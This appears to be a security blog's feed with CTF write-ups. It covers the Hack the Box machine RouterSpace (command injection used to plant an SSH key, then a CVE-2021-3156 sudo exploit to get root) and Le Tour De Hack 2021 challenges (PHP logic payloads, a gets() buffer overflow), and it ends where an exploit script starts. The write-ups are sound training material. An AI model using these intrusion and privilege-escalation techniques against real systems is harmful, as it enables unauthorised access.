Jekyll2022-07-11T23:31:28+01:00https://jdmce.com/feed.xmlJDMCEA cyber Security blog.John McEwanRouterSpace Writeup2022-07-11T13:00:00+01:002022-07-11T13:00:00+01:00https://jdmce.com/ctf%20writeups/RouterSpace-WriteUp<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-infocard.png" alt="" /></p>
<p>RouterSpace is an easy machine on Hack the Box</p>
<h2 id="enumeration">Enumeration</h2>
<p>nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.92 scan initiated Tue Jun 28 11:59:18 2022 as: nmap -sC -sV -oN scans/nmap 10.10.11.148</span>
Nmap scan report <span class="k">for </span>10.10.11.148
Host is up <span class="o">(</span>0.11s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 filtered tcp ports <span class="o">(</span>no-response<span class="o">)</span>
PORT STATE SERVICE VERSION
22/tcp open ssh <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c <span class="o">(</span>RSA<span class="o">)</span>
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 <span class="o">(</span>ECDSA<span class="o">)</span>
|_ 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 <span class="o">(</span>ED25519<span class="o">)</span>
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open http
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: RouterSpace
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-16039
| Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
| Content-Length: 73
| ETag: W/<span class="s2">"49-IwLi6cpjw6cEfY2GCFokDC4yPXw"</span>
| Date: Tue, 28 Jun 2022 15:59:35 GMT
| Connection: close
| Suspicious activity detected <span class="o">!!!</span> <span class="o">{</span>RequestID: sGB9 cHW3 0C wYIu <span class="o">}</span>
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-7090
| Accept-Ranges: bytes
| Cache-Control: public, max-age<span class="o">=</span>0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/<span class="s2">"652c-17d476c9285"</span>
| Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8
| Content-Length: 25900
| Date: Tue, 28 Jun 2022 15:59:34 GMT
| Connection: close
| <<span class="o">!</span>doctype html>
| <html <span class="nv">class</span><span class="o">=</span><span class="s2">"no-js"</span> <span class="nv">lang</span><span class="o">=</span><span class="s2">"zxx"</span><span class="o">></span>
| <<span class="nb">head</span><span class="o">></span>
| <meta <span class="nv">charset</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="o">></span>
| <meta http-equiv<span class="o">=</span><span class="s2">"x-ua-compatible"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"ie=edge"</span><span class="o">></span>
| <title>RouterSpace</title>
| <meta <span class="nv">name</span><span class="o">=</span><span class="s2">"description"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">""</span><span class="o">></span>
| <meta <span class="nv">name</span><span class="o">=</span><span class="s2">"viewport"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"width=device-width, initial-scale=1"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/bootstrap.min.css"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/owl.carousel.min.css"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/magnific-popup.css"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/font-awesome.min.css"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/themify-icons.css"</span><span class="o">></span>
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-14069
| Allow: GET,HEAD,POST
| Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
| Content-Length: 13
| ETag: W/<span class="s2">"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"</span>
| Date: Tue, 28 Jun 2022 15:59:34 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
<span class="o">==============</span>NEXT SERVICE FINGERPRINT <span class="o">(</span>SUBMIT INDIVIDUALLY<span class="o">)==============</span>
SF-Port22-TCP:V<span class="o">=</span>7.92%I<span class="o">=</span>7%D<span class="o">=</span>6/28%Time<span class="o">=</span>62BB2566%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>NULL
SF:,29,<span class="s2">"SSH-2</span><span class="se">\.</span><span class="s2">0-RouterSpace</span><span class="se">\x</span><span class="s2">20Packet</span><span class="se">\x</span><span class="s2">20Filtering</span><span class="se">\x</span><span class="s2">20V1</span><span class="se">\r\n</span><span class="s2">"</span><span class="o">)</span><span class="p">;</span>
<span class="o">==============</span>NEXT SERVICE FINGERPRINT <span class="o">(</span>SUBMIT INDIVIDUALLY<span class="o">)==============</span>
SF-Port80-TCP:V<span class="o">=</span>7.92%I<span class="o">=</span>7%D<span class="o">=</span>6/28%Time<span class="o">=</span>62BB2566%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>GetR
SF:equest,1F86,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X-Powered-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">
SF:X-Cdn:</span><span class="se">\x</span><span class="s2">20RouterSpace-7090</span><span class="se">\r\n</span><span class="s2">Accept-Ranges:</span><span class="se">\x</span><span class="s2">20bytes</span><span class="se">\r\n</span><span class="s2">Cache-Control:
SF:</span><span class="se">\x</span><span class="s2">20public,</span><span class="se">\x</span><span class="s2">20max-age=0</span><span class="se">\r\n</span><span class="s2">Last-Modified:</span><span class="se">\x</span><span class="s2">20Mon,</span><span class="se">\x</span><span class="s2">2022</span><span class="se">\x</span><span class="s2">20Nov</span><span class="se">\x</span><span class="s2">202021
SF:</span><span class="se">\x</span><span class="s2">2011:33:57</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">20W/</span><span class="se">\"</span><span class="s2">652c-17d476c9285</span><span class="se">\"\r\n</span><span class="s2">Content-Type:
SF:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">20charset=UTF-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2025900</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">2
SF:0Tue,</span><span class="se">\x</span><span class="s2">2028</span><span class="se">\x</span><span class="s2">20Jun</span><span class="se">\x</span><span class="s2">202022</span><span class="se">\x</span><span class="s2">2015:59:34</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r</span><span class="s2">
SF:</span><span class="se">\n\r\n</span><span class="s2"><!doctype</span><span class="se">\x</span><span class="s2">20html></span><span class="se">\n</span><span class="s2"><html</span><span class="se">\x</span><span class="s2">20class=</span><span class="se">\"</span><span class="s2">no-js</span><span class="se">\"\x</span><span class="s2">20lang=</span><span class="se">\"</span><span class="s2">zxx</span><span class="se">\"</span><span class="s2">></span><span class="se">\n</span><span class="s2"><h
SF:ead></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<meta</span><span class="se">\x</span><span class="s2">20charset=</span><span class="se">\"</span><span class="s2">utf-8</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<met
SF:a</span><span class="se">\x</span><span class="s2">20http-equiv=</span><span class="se">\"</span><span class="s2">x-ua-compatible</span><span class="se">\"\x</span><span class="s2">20content=</span><span class="se">\"</span><span class="s2">ie=edge</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">
SF:20</span><span class="se">\x</span><span class="s2">20<title>RouterSpace</title></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<meta</span><span class="se">\x</span><span class="s2">20name=</span><span class="se">\"</span><span class="s2">descr
SF:iption</span><span class="se">\"\x</span><span class="s2">20content=</span><span class="se">\"\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<meta</span><span class="se">\x</span><span class="s2">20name=</span><span class="se">\"</span><span class="s2">viewport</span><span class="se">\"\x</span><span class="s2">
SF:20content=</span><span class="se">\"</span><span class="s2">width=device-width,</span><span class="se">\x</span><span class="s2">20initial-scale=1</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">
SF:20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/bootstrap</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">2
SF:0</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/owl</span><span class="se">\.</span><span class="s2">carousel</span><span class="se">\.</span><span class="s2">m
SF:in</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/m
SF:agnific-popup</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20h
SF:ref=</span><span class="se">\"</span><span class="s2">css/font-awesome</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">sty
SF:lesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/themify-icons</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20"</span><span class="o">)</span>%r<span class="o">(</span>HTTPOptions
SF:,108,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X-Powered-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">X-Cdn:</span><span class="se">\</span><span class="s2">
SF:x20RouterSpace-14069</span><span class="se">\r\n</span><span class="s2">Allow:</span><span class="se">\x</span><span class="s2">20GET,HEAD,POST</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20tex
SF:t/html;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2013</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">20W/</span><span class="se">\"</span><span class="s2">d-bMe
SF:dpZYGrVt1nR4x</span><span class="se">\+</span><span class="s2">qdNZ2GqyRo</span><span class="se">\"\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Tue,</span><span class="se">\x</span><span class="s2">2028</span><span class="se">\x</span><span class="s2">20Jun</span><span class="se">\x</span><span class="s2">202022</span><span class="se">\x</span><span class="s2">2015
SF::59:34</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">GET,HEAD,POST"</span><span class="o">)</span>%r<span class="o">(</span>RTSPRequ
SF:est,2F,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\</span><span class="s2">
SF:r</span><span class="se">\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>X11Probe,2F,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\</span><span class="s2">
SF:x20close</span><span class="se">\r\n\r\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>FourOhFourRequest,12F,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X
SF:-Powered-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">X-Cdn:</span><span class="se">\x</span><span class="s2">20RouterSpace-16039</span><span class="se">\r\n</span><span class="s2">Content-T
SF:ype:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2073</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">
SF:20W/</span><span class="se">\"</span><span class="s2">49-IwLi6cpjw6cEfY2GCFokDC4yPXw</span><span class="se">\"\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Tue,</span><span class="se">\x</span><span class="s2">2028</span><span class="se">\x</span><span class="s2">20Jun</span><span class="se">\x</span><span class="s2">2
SF:02022</span><span class="se">\x</span><span class="s2">2015:59:35</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">Suspicious</span><span class="se">\x</span><span class="s2">20a
SF:ctivity</span><span class="se">\x</span><span class="s2">20detected</span><span class="se">\x</span><span class="s2">20!!!</span><span class="se">\x</span><span class="s2">20{RequestID:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20sGB9</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20cHW3</span><span class="se">\x</span><span class="s2">200C
SF:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20wYIu</span><span class="se">\x</span><span class="s2">20}</span><span class="se">\n\n\n\n\n\n</span><span class="s2">"</span><span class="o">)</span><span class="p">;</span>
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Tue Jun 28 11:59:49 2022 -- 1 IP address (1 host up) scanned in 31.13 seconds</span>
</code></pre></div></div>
<p>There is a website running on port 80. There isnt much on the site other than a download link.</p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-website.png" alt="" /></p>
<p>The download is an apk file, RouterSpace.apk.</p>
<p>I tried running some tools on the apk but couldnt find anything interesting.</p>
<p>To run the apk I use Genymotion, an android emulator.</p>
<h2 id="exploit">Exploit</h2>
<p>I install the apk in the emulated andoid. I can then intercept HTTP requests from the app using burp. Wifi - Manual - Proxy in android. Change listening interface in burp.</p>
<p>The app has only one button - “Check Status”</p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-app.png" alt="" /></p>
<p>Clicking this button sends the following HTTP request:</p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-app-request.png" alt="" /></p>
<p>I send the request to repeater and start to mess with different inputs.</p>
<p>The “ip” parameter is vulnerable to command injection.</p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-app-command-injection.png" alt="" /></p>
<p>I generate an ssh key pair and use the command injection to add it to pauls <code class="language-plaintext highlighter-rouge">authorized_keys</code> file. I can then connect via SSH.</p>
<h2 id="priv-esc">Priv Esc</h2>
<p>Running linpeas.sh suggests that the machine is vulnerable to <code class="language-plaintext highlighter-rouge">CVE-2021-3156</code>. This is the recent sudoedit vulnerability <a href="https://www.youtube.com/watch?v=TLa2VqcGGEQ"></a></p>
<p><a href="https://github.com/CptGibbon/CVE-2021-3156">github.com/CptGibbon/CVE-2021-3156</a></p>
<p>I copy the contents of this repo to the machine using scp.</p>
<p>Following the steps in the repo we get root!</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>paul@routerspace:/dev/shm/CVE-2021-3156<span class="nv">$ </span>./exploit
<span class="c"># id </span>
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>,1001<span class="o">(</span>paul<span class="o">)</span>
</code></pre></div></div>John McEwanRouterSpace is an easy machine on Hack the BoxLe Tour De Hack 2021 CTF WriteUp2021-06-21T20:34:30+01:002021-06-21T20:34:30+01:00https://jdmce.com/ctf%20writeups/Le-Tour-De-Hack-21-Writeup<p><img src="https://jdmce.com/assets/ltdh21/ltdh21.jpg" alt="Le Tour De Hack" /></p>
<p><a href="https://ltdh21.enusec.org/">Le Tour De Hack</a> was an online CTF event organised by <a href="https://enusec.org/">ENUSEC</a>, the Edinburgh Napier Security Society.</p>
<p>This write-up will cover the challenges I solved during the event.</p>
<h2 id="web">Web</h2>
<h3 id="redacted">Redacted</h3>
<ul>
<li>Description: You can’t see me therefore I must be hidden!</li>
<li>Solves: 32</li>
</ul>
<p>This was a simple challenge. We are given a webpage with the flag “redacted”. Viewing the page source reveals the flag.</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt"><html></span>
<span class="nt"><style></span>
<span class="nt">h1</span><span class="p">{</span>
<span class="nl">text-align</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span>
<span class="p">}</span>
<span class="nt"></style></span>
<span class="nt"><h1></span>Classified<span class="nt"></h1></span>
<span class="nt"><a></span>
<span class="nt"></a></span>
<span class="nt"><svg</span> <span class="na">width=</span><span class="s">"500"</span> <span class="na">height=</span><span class="s">"500"</span><span class="nt">></span>
<span class="nt"><text</span> <span class="na">x=</span><span class="s">"0"</span> <span class="na">y=</span><span class="s">"15"</span> <span class="na">fill=</span><span class="s">"black"</span><span class="nt">></span>THE FLAG IS<span class="nt"></text></span>
<span class="nt"><text</span> <span class="na">x=</span><span class="s">"100"</span> <span class="na">y=</span><span class="s">"15"</span> <span class="na">fill=</span><span class="s">"black"</span><span class="nt">></span>ltdh21{The_Truth_Is_Out_There}<span class="nt"></text></span>
<span class="nt"><rect</span> <span class="na">width=</span><span class="s">"300"</span> <span class="na">height=</span><span class="s">"20"</span> <span class="na">style=</span><span class="s">"fill:rgb(0,0,0);stroke-width:3;stroke:rgb(0,0,0)"</span> <span class="na">x=</span><span class="s">"100"</span> <span class="na">y=</span><span class="s">"0"</span> <span class="nt">/></span>
<span class="nt"></svg></span>
<span class="nt"></html></span>
</code></pre></div></div>
<hr />
<h3 id="php-trickery">PHP Trickery</h3>
<ul>
<li>Description: Daaaamn PHP, Back at it again with the crazy logic.</li>
<li>Solves: 12</li>
</ul>
<p>When the webpage loads it returns the message “Fail”. The source code contains the comment <code class="language-plaintext highlighter-rouge"><!-- ?source --></code>.
Adding the source parameter reveals the php source code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://trickery.enusec.org/index.php?source=
</code></pre></div></div>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><?php</span>
<span class="k">include</span><span class="p">(</span><span class="s2">"flag.php"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"source"</span><span class="p">])){</span>
<span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">function</span> <span class="n">inverse</span><span class="p">(</span><span class="nv">$x</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="mi">1</span><span class="o">/</span><span class="nv">$x</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">])){</span>
<span class="k">if</span><span class="p">(</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">])</span> <span class="o"><</span> <span class="mi">8</span><span class="p">){</span>
<span class="k">if</span><span class="p">(</span><span class="nf">inverse</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">])</span> <span class="o"><</span> <span class="o">-</span><span class="mi">50000000</span><span class="p">)</span> <span class="p">{</span>
<span class="k">die</span><span class="p">(</span><span class="nv">$flag</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">echo</span><span class="p">(</span><span class="s2">"Fail"</span><span class="p">);</span>
<span class="cp">?></span>
</code></pre></div></div>
<p>We can see that in order to reveal $flag we need to pass a number to the _ parameter, this number must be smaller than -50000000 after the inverse function. The number must also be less than 8 characters long. I first tried using hex however we need to pass a negative number and the strlen() function would include the 0x part of 0x0000 therefore hex wont work.</p>
<p>To provide a small enough negative number we can use scientific notation. The number <code class="language-plaintext highlighter-rouge">-1e-9</code> will pass the tests.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://trickery.enusec.org/index.php?_=-1e-9
ltdh21{WhAts_B1gg3r_INF_or_Negative_INF}
</code></pre></div></div>
<hr />
<h3 id="exception-not-found">Exception not Found</h3>
<ul>
<li>Description: Sometimes I get a call from my bank, and the first thing they ask is, ‘Mr. Mitnick, may I get your account number?’ And I’ll say, ‘You called me! I’m not giving you my account number!</li>
<li>Solves: 11</li>
</ul>
<p>Similar to php trickery adding the source= parameter reveals the php source:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><?php</span>
<span class="k">include</span><span class="p">(</span><span class="s2">"flag.php"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"source"</span><span class="p">])){</span>
<span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">function</span> <span class="n">inverse</span><span class="p">(</span><span class="nv">$x</span><span class="p">,</span> <span class="nv">$flag</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$x</span> <span class="o">==</span> <span class="s2">""</span><span class="p">){</span>
<span class="k">throw</span> <span class="k">new</span> <span class="nc">Exception</span><span class="p">(</span><span class="s2">"Not today Sucker"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$x</span><span class="p">)</span> <span class="p">{</span>
<span class="k">throw</span> <span class="k">new</span> <span class="nc">Exception</span><span class="p">(</span><span class="nv">$flag</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">1</span><span class="o">/</span><span class="nv">$x</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">try</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">])){</span>
<span class="k">echo</span> <span class="s2">"Your answer is: "</span> <span class="mf">.</span> <span class="nf">inverse</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">],</span> <span class="nv">$flag</span><span class="p">)</span> <span class="mf">.</span> <span class="s2">"<br>"</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nc">Exception</span> <span class="nv">$e</span><span class="p">)</span> <span class="p">{</span>
<span class="k">echo</span> <span class="s1">'Caught exception: '</span><span class="p">,</span> <span class="nv">$e</span><span class="o">-></span><span class="nf">getMessage</span><span class="p">(),</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">?></span>
</code></pre></div></div>
<p>This looks similar to PHP Trickery, again we need to supply a number to the _ parameter. This time we need to throw the exception that calls $flag. We can do this by setting _ = 0.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://exception.enusec.org/index.php?_=0
Caught exception: ltdh21{D0S_By_D1v1si0n}
</code></pre></div></div>
<hr />
<h2 id="pwn">Pwn</h2>
<h3 id="pwn101">Pwn101</h3>
<ul>
<li>Description: For the average home-user, anti-virus software is a must.</li>
<li>Solves: 10</li>
</ul>
<p>For the challenge we are provided main.c, a main binary and a nc session which runs the same binary remotely.</p>
<p>main.c:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <string.h>
#include <stdio.h>
</span>
<span class="kt">void</span> <span class="nf">secret</span><span class="p">()</span> <span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"ltdh21{N0t_T0dAy_SuCK3r5}</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">name</span><span class="p">()</span> <span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"What is your name: "</span><span class="p">);</span>
<span class="kt">char</span> <span class="n">str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="n">gets</span><span class="p">(</span><span class="n">str</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">str</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span> <span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span> <span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"There is a secret at: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">secret</span><span class="p">);</span>
<span class="n">name</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This is a simple buffer overflow challenge. Running the binary we are promped to provide a name, which is the printed to screen. The binary also provides the memory address of the secret() function.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./main
There is a secret at: 0x5660020d
What is your name:
JDMCE
Hello JDMCE
</code></pre></div></div>
<p>This address changes each time the binary is run so we will have to extract that in our exploit script.</p>
<p>We can cause a segmentation fault by overflowing the input buffer which the source tells us is str[20]. Using gdb/gef I determined the offset required to overwrite $eip which is 32, we can now write an exploit script</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
